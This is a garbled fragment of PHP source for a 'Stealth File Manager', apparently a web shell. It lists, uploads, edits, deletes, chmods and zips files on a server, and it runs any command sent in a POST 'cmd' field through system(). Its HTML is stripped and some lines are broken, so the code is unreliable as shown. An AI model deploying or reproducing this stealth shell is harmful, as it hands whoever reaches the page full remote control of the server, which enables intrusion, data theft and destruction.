'; exit; } } function isValidPath($path) { return strpos(realpath($path), realpath($GLOBALS['baseDir'])) === 0; } function listFiles($dir) { $items = scandir($dir); $list = []; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; $list[] = [ 'name' => $item, 'path' => $path, 'is_dir' => is_dir($path), 'size' => is_file($path) ? filesize($path) : '-', 'perms' => substr(sprintf('%o', fileperms($path)), -4) ]; } return $list; } $currentDir = isset($_GET['path']) ? realpath($_GET['path']) : realpath($baseDir); if (!isValidPath($currentDir)) $currentDir = $baseDir; $files = listFiles($currentDir); if (isset($_GET['search']) && $_GET['search'] !== '') { $query = strtolower($_GET['search']); $files = array_filter($files, function($f) use ($query) { return strpos(strtolower($f['name']), $query) !== false; }); } usort($files, function($a, $b) { return strcasecmp($a['name'], $b['name']); }); // File actions if (isset($_POST['chmod_path']) && isset($_POST['chmod_value'])) { $target = realpath($_POST['chmod_path']); if (isValidPath($target)) { chmod($target, intval($_POST['chmod_value'], 8)); } } $msg = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['mkdir'])) { $new = $currentDir . '/' . basename($_POST['mkdir']); if (!file_exists($new)) mkdir($new); } if (isset($_POST['upload']) && $_FILES['file']['tmp_name']) { move_uploaded_file($_FILES['file']['tmp_name'], $currentDir . '/' . basename($_FILES['file']['name'])); } if (isset($_POST['delete'])) { $target = realpath($_POST['delete']); if (isValidPath($target)) { if (is_dir($target)) rmdir($target); else unlink($target); } } if (isset($_POST['cmd'])) { ob_start(); system($_POST['cmd']); $output = ob_get_clean(); } } ?> Stealth FM

Stealth File Manager

$output"; ?>
Root"; foreach ($parts as $part) { if ($part === '') continue; $path .= DIRECTORY_SEPARATOR . $part; echo " / " . htmlspecialchars($part) . ""; } ?>

Current:

NameTypeSizePermsActions
" . $f['name'] . "" : $f['name'] ?>
NameTypeSizePermsActions
" . $f['name'] . "" : $f['name'] ?>
View | Edit |
// File preview and edit if (isset($_GET['view'])) { $file = realpath($_GET['view']); if (!isValidPath($file) || !is_file($file)) exit('Access denied or file not found.'); echo "
"
        . htmlspecialchars(file_get_contents($file)) . "
"; exit; } if (isset($_GET['edit'])) { $file = realpath($_GET['edit']); if (!isValidPath($file) || !is_file($file)) exit('Access denied or file not found.'); if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { file_put_contents($file, $_POST['content']); header("Location: ?path=" . urlencode(dirname($file))); exit; } $content = htmlspecialchars(file_get_contents($file)); echo "

Editing: " . basename($file) . "


"; exit; } Zip and Unzip if (isset($_POST['zip']) && isset($_POST['zipname'])) { $zipFile = $currentDir . '/' . basename($_POST['zipname']) . '.zip'; $zip = new ZipArchive(); if ($zip->open($zipFile, ZipArchive::CREATE) === TRUE) { foreach ($_POST['zip'] as $item) { $itemPath = realpath($item); if (isValidPath($itemPath)) { if (is_file($itemPath)) { $zip->addFile($itemPath, basename($itemPath)); } } } $zip->close(); } } if (isset($_POST['unzip'])) { $zipPath = realpath($_POST['unzip']); if (isValidPath($zipPath) && is_file($zipPath)) { $zip = new ZipArchive(); if ($zip->open($zipPath) === TRUE) { $zip->extractTo($currentDir); $zip->close(); } } }